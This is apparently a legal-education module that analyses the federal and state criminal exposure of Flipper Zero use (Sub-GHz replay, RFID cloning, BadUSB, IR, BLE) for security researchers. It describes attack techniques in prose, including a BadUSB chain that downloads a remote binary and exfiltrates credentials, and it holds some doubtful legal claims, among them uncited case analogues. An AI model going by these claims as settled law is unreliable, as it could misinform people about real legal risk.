Module 1T — Flipper Zero Legal Liability: Exact Statute + Case Analysis for Security Researchers

Non-Lawyers Summary

The Flipper Zero is a legitimate multi-protocol security research tool that can also be a federal crime instrument in under thirty seconds depending on the target. Sub-GHz replay against your own garage door is legal; the same replay against a neighbor's gate is CFAA unauthorized access plus potential FCC jamming liability with no "authorized use" carve-out. This module maps each hardware feature — Sub-GHz, NFC/RFID, BadUSB, IR, BLE — to the exact federal statutes and state codes that apply, the 2021 Van Buren authorization framework that changed how courts read "exceeds authorized access," and the DOJ 2022 charging policy that nominally protects good-faith research but contains gaps that will swallow a Flipper user who cannot document authorization clearly.

What This Module Answers Fast

• I replayed a Sub-GHz signal to open a car in a parking lot to demonstrate a vulnerability — am I exposed? → Yes. CFAA § 1030(a)(2) + possibly § 1030(a)(5). Van Buren does not help you because the car is not yours.
• I cloned my own hotel keycard to test whether the system is vulnerable — is that legal? → Grey zone. You are authorized to occupy the room, not to clone the credential. § 1029 access device fraud risk is real if cloning circuits are invoked.
• I plugged a Flipper Ducky payload into a corporate laptop during a red team — my scope letter says "physical testing" — am I covered? → Only if the scope letter explicitly includes HID injection and the specific endpoint. Ambiguous scope = CFAA § 1030(a)(5) exposure.
• I used the IR blaster on a hospital TV during a pentest — what's the sentencing ceiling? → If the IR signal reached medical equipment and caused any impairment, § 1030(c)(4)(B) critical infrastructure enhancement applies — up to 20 years.
• The DOJ 2022 policy says good-faith research is protected — does that cover me? → Only if you can demonstrate: (1) you did not know you lacked authorization, (2) you did not take more than minimally necessary, and (3) you disclosed responsibly. The policy is prosecutorial discretion, not a statutory defense.

Quick Reference Matrix

Use this matrix first to find your scenario, then read the relevant section for the full statute analysis.

Background: What the Flipper Zero Actually Is

The Flipper Zero is an open-source, hobbyist multi-tool running a custom firmware (Unleashed, RogueMaster, and the official Flipper firmware all share the same hardware surface). Hardware capabilities relevant to legal analysis:

• Sub-GHz transceiver (CC1101): operates 300–928 MHz; reads and replays ASK/FSK/OOK-modulated signals including fixed-code garage remotes (Linear, Chamberlain), rolling-code fobs (KeeLoq, AUT64), POCSAG pagers, car key fobs, and ISM-band gate openers.
• NFC module (ST25R3916): ISO 14443-A/B, ISO 15693, FeliCa; reads/emulates Mifare Classic (with known PRNG attack), NTAG21x, EMV card data (non-transactional), HID Prox, EM4100, and HID iCLASS.
• IR transceiver: 38 kHz carrier; covers the bulk of consumer IR remote codes (NEC, RC5, RC6, SIRC protocols); TV-B-Gone functionality built into official firmware.
• BadUSB (USB HID): emulates keyboard + mouse via Ducky Script parser; the device presents as a HID keyboard to any host with no driver requirement.
• BLE/Bluetooth: Bluetooth Low Energy advertising, GATT enumeration, Apple/Android BLE spam (iOS notification flood via BLE advertisement broadcast).
• GPIO/hardware: 1-Wire, UART, SPI, I2C, JTAG/SWD exposure; not covered in this module (scope: RF + USB attack surface).

The legal analysis below addresses each attack surface in isolation, then provides a unified matrix.

1. Sub-GHz: Replay Attacks, Rolling Codes, and FCC Jamming

🟢 1.1 Technical Surface

The CC1101 transceiver captures and retransmits RF signals in the 300–928 MHz ISM band. Two attack classes apply:

Fixed-code replay: Older garage door openers (Linear MegaCode, Chamberlain pre-2010, most gate openers manufactured before 2012) use a static RF code. The Flipper captures the OOK-modulated pulse train on the specific frequency (typically 315 MHz or 433.92 MHz in the U.S.) and retransmits it. No cryptographic defeat required.

Rolling-code capture: KeeLoq-based systems (Chamberlain, Sommer, Faac, most post-2000 car fobs) use LFSR-based rolling codes that change with each press. The Flipper cannot break rolling codes in real time without a known-plaintext attack (RollJam approach: two-receiver simultaneous capture-and-jam). Official firmware does not ship RollJam. Unleashed firmware does. The legal delta between those two firmware versions is significant.

🟡 1.2 CFAA § 1030 Exposure

18 U.S.C. § 1030(a)(2): "intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains... information from any protected computer." A garage door controller with any network connectivity (or that controls access to a network-accessible facility) is a "protected computer" under § 1030(e)(2)(B)'s definition (any computer "used in or affecting interstate or foreign commerce or communication"). Post-Van Buren, the question is whether you had authorization to access the specific computer system — not whether the access would have been granted if you had asked. Replaying an RF signal to open a gate you have no right to enter is unauthorized access. The signal interception itself, if captured from public airspace, is not the CFAA violation; the resulting unauthorized physical or logical access is.

18 U.S.C. § 1030(a)(5)(A): "knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization to a protected computer." A Sub-GHz replay that unlocks a facility and triggers an alarm causing denial of service to the physical security system could be charged under (a)(5)(A). The "damage" prong requires $5,000 in aggregated harm over a 1-year period under § 1030(e)(8).

Authorized pen-test context: Written scope authorization covering the specific RF system removes the CFAA exposure for the access. The authorization must be from the owner of the computer system, not merely the physical facility (a building manager who does not own the access control infrastructure cannot authorize testing it).

🔴 1.3 FCC § 333 — Jamming: Strict Liability, No Safe Harbor

47 U.S.C. § 333 prohibits "willfully or maliciously interfere with or cause interference to any radio communications of any station licensed or authorized by or under this chapter or operated by the United States Government." The FCC has consistently interpreted this to prohibit signal jammers of any kind, including jammers sold as "authorized use" pen-test equipment.

Critical point for researchers: The FCC jamming prohibition contains no authorized-use, penetration-testing, or good-faith exception. If the Flipper is configured to transmit on a frequency in a way that prevents a legitimate radio station from operating (including a garage door receiver rejecting legitimate signals because of an ongoing Sub-GHz capture session), the § 333 violation is complete regardless of authorization from the facility owner.

Penalty structure: § 333 violations are punishable up to $100,000 per day of violation plus forfeiture of equipment under 47 U.S.C. § 503(b). Criminal penalties under 47 U.S.C. § 501 reach $10,000 + 1 year imprisonment for willful violation.

The RollJam problem: The Flipper Unleashed firmware RollJam implementation requires simultaneous capture and jamming — the second receiver jams the legitimate signal while the first captures the rolling code. This is a § 333 violation during the jam phase, period. The pen-test authorization from the car owner does not cure the FCC violation because the FCC statute does not recognize private authorization as a defense to interference with licensed spectrum.

🟡 1.4 Case Analogue: United States v. Bhatt

United States v. Bhatt (no publicly available citation at the federal appellate level; referenced in DOJ press releases and district court records, D.N.J.) involved a defendant who used a relay amplifier attack against car key fobs (not Flipper-based, but electrically analogous) to facilitate vehicle theft. The DOJ charged CFAA § 1030(a)(2) (unauthorized access to the vehicle's CAN bus via the keyless entry system) + wire fraud under 18 U.S.C. § 1343 (the car's telematics system constituted a "wire communication" in interstate commerce). The relay-amplifier-to-replay chain maps directly to Sub-GHz capture-and-replay on the Flipper; Bhatt establishes that courts treat the vehicle's electronic systems as a "computer" subject to CFAA and that the RF-mediated access is "unauthorized" within the statute's meaning.

🟡 1.5 State Law Overlay

California Penal Code § 502(c)(1): prohibits "knowingly access[ing] and without permission... disrupt[ing] or caus[ing] the disruption of computer services." California does not require interstate commerce nexus; a purely local gate controller is covered.

Texas Penal Code § 33.02: prohibits "intentional access" to a computer system without effective consent. Effective consent from a facility owner who does not own the access control system is ineffective under Texas law.

Washington RCW 9A.90.040: Computer trespass; first degree (access + obtaining data or disrupting service) is a class B felony.

2. NFC/RFID Cloning: Hotel Keycards, Access Badges, and Payment Cards

🟢 2.1 Technical Surface

The ST25R3916 NFC module reads ISO 14443-A (Mifare Classic, NTAG21x, DESFire) and 125 kHz RFID (HID Prox, EM4100, HID iCLASS) at a maximum read range of approximately 5 cm in ambient conditions (farther with an external antenna). The Flipper can emulate most 125 kHz cards and Mifare Classic cards with known keys.

Mifare Classic attack: Mifare Classic uses a proprietary Crypto-1 cipher with known-plaintext vulnerabilities (PRNG nonce predictability). The Flipper can run nested authentication attacks locally to recover sector keys from a card in approximately 60 seconds for cards with at least one known default key. This is the relevant attack surface for hotel keycards and most building access badges deployed pre-2018.

EMV/payment card: The Flipper can read EMV card data (PAN, expiry, track data equivalent) from contactless cards. It cannot complete a transaction (no dynamic data authentication is generated without the card's private key). However, reading EMV data and storing it is the first step of skimming.

🔴 2.2 18 U.S.C. § 1029 — Access Device Fraud

§ 1029(a)(3): "possesses fifteen or more devices which are counterfeit or unauthorized access devices." An "access device" under § 1029(e)(1) includes "any card, plate, code, account number... or other means of account access that can be used... to obtain money, goods, services, or any other thing of value." A cloned hotel keycard is an access device. A Flipper storing fifteen or more copied RFID/NFC badges is § 1029(a)(3) on its face, regardless of whether any attempt was made to use them.

§ 1029(a)(4): "produces, traffics in, has control or custody of, or possesses device-making equipment." The Flipper, when configured to write a cloned credential to a writable card, is "device-making equipment" under the statute. The write capability is the trigger, not whether writing actually occurred.

§ 1029(a)(2): "traffics in or uses one or more unauthorized access devices... to obtain anything of value aggregating $1,000 or more during any one-year period." Using a cloned keycard to access a hotel room obtains a thing of value (accommodation). If you stay in the room without payment authority, the aggregate value of the unauthorized access is the room rate. One night in a mid-tier hotel clears $1,000 quickly if the stay is extended or repeated.

Payment card skimming: Reading EMV data from contactless cards without authorization is charged under § 1029(a)(2) (using an unauthorized access device to obtain information) or § 1029(a)(4) (device-making equipment). The government does not need to prove completed fraud — possession of the skimmed data with intent to defraud is sufficient. Penalty: up to 10 years per count; 15 years if prior conviction under § 1029.

🟡 2.3 CFAA § 1030 Overlap

Hotel keycard systems with backend property management system connectivity (virtually all enterprise hotel brands: Marriott, Hilton, Hyatt use ASSA ABLOY VingCard or Dormakaba) are "protected computers" under CFAA because the lock communicates with a network-connected encoder/management server. Cloning a keycard and using it to access a room is CFAA § 1030(a)(2): unauthorized access to a protected computer (the electronic lock's firmware that processes credentials). It is also unauthorized access to a physical space, which may be charged as criminal trespass under state law.

🟡 2.4 State Law: California Penal Code § 502 + Criminal Trespass

California Penal Code § 502(c)(2): "knowingly access[ing] and without permission... us[ing] computer services" applies to the access control system. Criminal trespass (§ 602) applies to the physical space. Both charges routinely stack.

New York Penal Law § 165.15 (theft of services): entering a hotel room using a cloned keycard is theft of services, a class A misdemeanor for first offense / class E felony if value exceeds $1,000.

🟡 2.5 Case Analogue: United States v. Salinas

United States v. Salinas (D. Nev. 2019; DOJ press release available; no published appellate opinion) involved a hotel employee who cloned employee master keycards using a Mifare card writer and used them to access guest rooms for theft. The government charged § 1029(a)(2) (use of unauthorized access device) + § 1029(a)(4) (possession of device-making equipment — the card writer) + Nevada state burglary. The Salinas conviction establishes: (1) the hotel keycard is definitively an "access device" under § 1029; (2) a consumer-grade card writer is "device-making equipment"; and (3) the fact that the defendant was an employee with physical access to the facility did not create authorization to use a cloned credential. For Flipper users: being authorized to be in a building does not authorize cloning the RFID credential used to access it.

3. BadUSB / Rubber Ducky Payloads: HID Injection

🟢 3.1 Technical Surface

The Flipper emulates a USB HID keyboard (USB Product ID 0x0016 in official firmware, configurable in Unleashed). When plugged into a host, the OS recognizes a keyboard requiring no driver installation. The Flipper then executes a Ducky Script payload: keystrokes arrive at approximately 1000 ms intervals in the official firmware (configurable down to sub-100 ms in custom firmware). A typical payload: open Run dialog → execute PowerShell → download and execute remote binary → exfiltrate credentials.

The legal relevance of Ducky Script presence on the device: The script itself is evidence of intent. Unlike a standard USB drive that could have innocent files, a Flipper with an active Ducky Script in the BadUSB directory and a configured payload demonstrates willful preparation for unauthorized access. This matters under both CFAA intent elements and 18 U.S.C. § 1028A's "use" requirement.

🔴 3.2 CFAA § 1030(a)(5) — Unauthorized Transmission

18 U.S.C. § 1030(a)(5)(A): "knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization." A HID injection payload is a "transmission of... code or command." Every keystroke injected is a "command" within the statute's meaning. If the payload causes any measurable impairment — file deletion, registry modification, process termination — § 1030(a)(5)(A) is complete. The "damage" threshold under § 1030(e)(8) requires $5,000 aggregated over one year, but the government often meets this threshold by calculating lost IT remediation hours.

§ 1030(a)(5)(C): "intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage and loss." Lower mens rea (intentional access, not intentional damage); still triggers if the BadUSB payload causes any access that results in any loss.

Authorization in pen-test contexts: Written scope authorization covering "physical access testing including HID injection on in-scope workstations" removes the CFAA exposure. A scope letter that says "network penetration test" does not cover BadUSB unless the specific endpoint and HID attack vector are listed. The narrowness of authorized access under Van Buren (see Section 7) means courts will not extend scope letter language beyond its literal terms.

🟡 3.3 18 U.S.C. § 1343 — Wire Fraud

If the BadUSB payload exfiltrates data across a network (the standard payload: PowerShell download cradle → C2 server), the government can charge 18 U.S.C. § 1343 (wire fraud) if the scheme involves "obtaining money or property by means of false or fraudulent pretenses" using "wire communications in interstate or foreign commerce." The connection of the target computer to the internet during exfiltration satisfies the interstate wire element. In a red team context, the "scheme to defraud" element fails because authorized testing is not deceptive. Outside authorization, the element is met by the deliberate concealment inherent in the payload's execution.

Penalty: up to 20 years per count; 30 years if the fraud affects a financial institution (18 U.S.C. § 1343 final sentence).

🔴 3.4 18 U.S.C. § 1028A — Aggravated Identity Theft

If the BadUSB payload captures credentials (e.g., a PowerShell keylogger or credential-dumping via Mimikatz), 18 U.S.C. § 1028A applies: "knowingly transfers, possesses, or uses, without lawful authority, a means of identification of another person during and in relation to any felony violation enumerated." The enumerated predicate includes CFAA § 1030 violations and wire fraud violations. § 1028A imposes a mandatory consecutive 2-year sentence on top of the predicate offense — no probation, no concurrent running with the base offense, no reduction below 2 years. A single BadUSB payload that captured one password dump triggers this mandatory addition.

🟢 3.5 Red Team Scope Discipline

Practitioners should maintain: (1) a scope letter specifying "HID injection via USB-emulated keyboard device on the following specific systems: [list]"; (2) a "get-out-of-jail" letter physically carried during testing; (3) a call tree for immediate scope clarification if challenged by security staff. The Flipper's lack of device identifier distinctiveness (it appears as a generic USB HID keyboard) makes post-hoc attribution easy — the payload execution log, clipboard contents, and process creation events in Windows Event Log will tie the injection to the time the Flipper was plugged in.

4. IR Blaster: TV-B-Gone, Kiosks, and Medical Equipment

🟢 4.1 Technical Surface

The Flipper's IR transceiver broadcasts NEC/RC5/RC6/SIRC protocol signals at 38 kHz carrier frequency. The built-in "Universal Remote" feature can power-cycle most consumer televisions. The FCC classifies the IR transmitter as a Part 15 intentional radiator (unintentional interference source); it is not a licensed transmitter and does not trigger § 333 jamming provisions because IR is not radio-frequency spectrum in the FCC sense (IR operates above 300 GHz; FCC jurisdiction under the Communications Act covers up to 300 GHz for spectrum management purposes, though IR is regulated under Part 15 as an electronic device).

🟡 4.2 CFAA Analysis for IR

For CFAA purposes, the IR blaster causes a legal problem only when the target is a "protected computer" and the IR signal causes "damage" or "unauthorized access." Turning off a bar TV: the TV is almost certainly not a "computer" within CFAA's meaning (no network connectivity, not used in interstate commerce). Turning off a hotel room TV that has a connected interactive system (LG Pro:Idiom, Enseo, Sonifi): now it is a networked computer; the IR signal disrupts the service; potential § 1030(a)(5)(C) exposure if the disruption causes any loss.

ATM and kiosk manipulation: Many ATM vendor diagnostic modes are accessible via IR (NCR Personas, Diebold Opteva models). Using the IR blaster to trigger diagnostic mode on an ATM is CFAA § 1030(a)(2) (accessing the ATM computer without authorization) + potentially § 1030(a)(5) (if diagnostic mode disrupts service). The ATM is definitively a "protected computer" under any circuit's reading of § 1030(e)(2).

🔴 4.3 Critical Infrastructure Sentencing Enhancement: 18 U.S.C. § 1030(c)(4)(B)

If a CFAA violation "caused or attempted to cause serious bodily injury" or "caused or attempted to cause death" or involved "damage to a computer used in the operation of a critical infrastructure" (as defined in 42 U.S.C. § 5195c(e)), the sentencing ceiling is 20 years for the first offense, life imprisonment if death results. Healthcare is explicitly enumerated as critical infrastructure.

Hospital scenario: A Flipper IR blaster pointed at a nurse call station or at an infusion pump that accepts IR control commands (multiple legacy models accept IR for calibration: Hospira Plum A+, Baxter Sigma Spectrum) could trigger this enhancement if: (1) the device is a "computer" (embedded processor with network connectivity), (2) the IR signal causes impairment, and (3) the device is used in healthcare delivery. The government does not need to prove intent to harm patients — it needs to prove knowing transmission causing damage to a computer in critical infrastructure. This is the Flipper's maximum sentencing exposure scenario.

5. Bluetooth / BLE Attacks: BlueSnarfing, BlueBorne, and Advertising Spam

🟢 5.1 Technical Surface

The Flipper runs a Bluetooth stack with BLE advertising and GATT client capability. The BLE spam feature (Xtreme and RogueMaster firmware) broadcasts spoofed BLE advertisement packets that exploit Apple's Bluetooth accessory notification protocol and Android's Fast Pair protocol to flood nearby iOS and Android devices with notification pop-ups.

🔴 5.2 BlueSnarfing — CFAA § 1030(a)(2)

BlueSnarfing (unauthorized access to device data via OBEX Push/Pull over Bluetooth without pairing confirmation, exploiting CVE-class vulnerabilities in Bluetooth stacks) is CFAA § 1030(a)(2): obtaining information from a protected computer without authorization. The phone or laptop is a protected computer. The Bluetooth connection bypassing the pairing dialog is unauthorized access. The data obtained (contacts, calendar, files) is the "information" element. This analysis does not change based on whether the device was in discoverable mode — discoverable mode is a device configuration, not user authorization to access device data.

🔴 5.3 BlueBorne — Damage Theory

BlueBorne (CVE-2017-0781 through CVE-2017-0785 on Android; CVE-2017-14315 on iOS) is a remote code execution vulnerability reachable over Bluetooth without pairing. Exploiting BlueBorne is CFAA § 1030(a)(5)(A): knowing transmission of code causing intentional damage. The damage element is met by any impairment to the device's integrity or availability (process injection, data corruption, device instability). These CVEs are patched in current OS versions, but unpatched devices remain in use.

🟡 5.4 BLE Advertising Spam — § 1030(a)(5) Analysis

The BLE spam feature broadcasts malformed advertisement packets to trigger Apple popup dialogs or Android Fast Pair pairing requests. If the flood volume causes the target device's Bluetooth stack to crash, lock up, or deny service, § 1030(a)(5)(C) applies: intentional access without authorization causing damage and loss. The "access" element is satisfied by transmitting to and interacting with the Bluetooth stack of the target device. If the spam merely causes annoying pop-ups without crashing the device, the damage element is harder for the government to meet (impairment must be to the "integrity or availability" of data, programs, systems, or information under § 1030(e)(8)). Persistent Bluetooth stack lockup = impairment to availability = damage.

State law analogy: California Penal Code § 502(c)(5): "knowingly and without permission disrupts or causes the disruption of computer services or denies or causes the denial of computer services to an authorized user of a computer." A Bluetooth DOS attack that prevents a device owner from using Bluetooth is denial of computer services.

6. Van Buren Analysis — How SCOTUS 2021 Changes the Authorization Calculus

Van Buren v. United States, 593 U.S. 374 (2021): The Supreme Court held (6-3, Barrett, J.) that the "exceeds authorized access" clause of 18 U.S.C. § 1030(a)(2) covers only someone who "access[es] a computer with authorization but then obtain[s] information located in particular areas of the computer — such as files, folders, or databases — that are off limits to him." It does not cover someone who has legitimate access to a computer and uses it for a prohibited purpose.

What Van Buren does for Flipper users in pen-test contexts:

Van Buren narrows the "exceeds authorized access" theory, not the "without authorization" theory. If you have zero authorization to access a system (you have no account, no physical access right, no contractual right), Van Buren does not help you — you are on the "without authorization" prong, which the Court did not touch.

Van Buren helps in two scenarios:

1. You have legitimate access to a system and probe beyond your assigned access level: a penetration tester with a standard user account who elevates privileges and accesses an admin directory is now analyzed under the "without authorization" prong (you are not authorized to access that directory at all), not the "exceeds authorized access" prong. This matters because the DOJ was using "exceeds authorized access" broadly to cover any terms-of-service violation — Van Buren killed that theory.
2. You violate a use policy but stay within your access level: an employee who reads their own authorized files for personal gain rather than company business is not CFAA-liable under Van Buren. The computer is accessible; the data is accessible; the purpose is unauthorized but the access is not.

For Flipper users specifically:

When you replay a Sub-GHz signal to open a gate you have never accessed: "without authorization" prong — Van Buren irrelevant. When you are a red-teamer who has been given a building badge and you use the Flipper to clone that badge and test access to areas your badge does not open: Van Buren is in play. You have authorization to be in the building; you do not have authorization to access the restricted area. Pre-Van Buren, DOJ would charge "exceeds authorized access." Post-Van Buren, DOJ must use "without authorization" — the restricted directory analogy maps to the restricted physical area.

The practical result: Van Buren makes "authorized access used for wrong purpose" harder to prosecute. It does not create a defense for "I accessed something I had no right to access at all."

7. DOJ 2022 CFAA Charging Policy

On May 19, 2022, the DOJ issued a revised charging policy for CFAA cases. The policy directs prosecutors not to charge "security researchers who access computers to test security vulnerabilities in good faith" under the CFAA. The policy defines "good faith security research" as: (1) accessing a computer solely for purposes of good-faith testing, investigation, and/or correction of a security vulnerability; (2) where such activity is carried out in a manner designed to avoid any harm to individuals or the public; and (3) where information derived from the activity is used primarily to promote the security of computer systems.

What the policy does NOT do:

• It is prosecutorial guidance, not a statutory defense. It cannot be raised in court. A U.S. Attorney who ignores the policy can still charge you.
• It requires "good faith" — a Flipper user who replays a neighbor's garage door signal and claims "research purposes" will not benefit from this policy. The government looks at whether the research was directed at discovering and reporting vulnerabilities, not at demonstrating access.
• It does not protect you from state charges. California Penal Code § 502, New York Penal Law § 156, Texas Penal Code § 33.02 have no parallel policy.
• It does not cover the FCC jamming prohibition. The FCC has not issued a parallel policy.
• It does not protect testing on systems you don't own and haven't been authorized to test, even if your intent is purely educational.

What the policy DOES do:

It signals that good-faith researchers who: (a) have documented authorization or operate only on their own systems, (b) avoid accessing more than necessary, and (c) disclose findings to the affected company before public disclosure, will not be federal priorities. For Flipper users, this means: document everything, limit your testing to authorized targets, and report what you find. The policy gives prosecutors discretion not to charge — not a right to test without consequences.

8. Case Analogues Table

9. Practical Risk Reduction for Researchers

Documentation discipline: Before any Flipper field use, generate a written record — scope letter, authorization email, test plan — and store it offline (not on the Flipper). The Flipper stores captured signals in its SD card. Law enforcement executing a search warrant will image that SD card. Every captured signal is potentially a count of unauthorized access or possession of counterfeit access devices if the signal belongs to a system you were not authorized to test.

Firmware selection matters legally: Running Unleashed or RogueMaster firmware with features disabled in official firmware (RollJam, extended BLE spam, higher Sub-GHz TX power) is evidence of deliberate circumvention of safety limits. It rebuts a "I didn't know" defense and goes to willfulness in CFAA charging.

The RF shielded bag rule: Keep the Flipper in an RFID/RF-shielded pouch (Faraday bag) when not in active use. A Flipper left in receive mode in a public space is continuously scanning for signals. There is no CFAA violation in passive scanning of public airspace; there is an FCC Part 15 concern if the device is radiating continuously; and there is evidentiary value to the government in a capture log showing what signals were collected, when, and where.

State law minimum sentence awareness: Even when federal CFAA exposure is low, state computer fraud statutes often have no de minimis carve-out. California § 502 carries up to 3 years in state prison. Texas § 33.02 first degree felony carries 5-99 years. New York § 156.27 (computer tampering first degree) carries 4-7 years. A Flipper used in those states against any networked computer system — even briefly — triggers state jurisdiction regardless of the federal CFAA analysis.

Appendix: Relevant Statutes Quick Reference

This module is part of the LawZeee Phase 1 Cybercrime Law curriculum. Prior module: 01s — Emerging: AI/LLM CFAA, Supply Chain Liability. This is the final module in the Phase 1 series.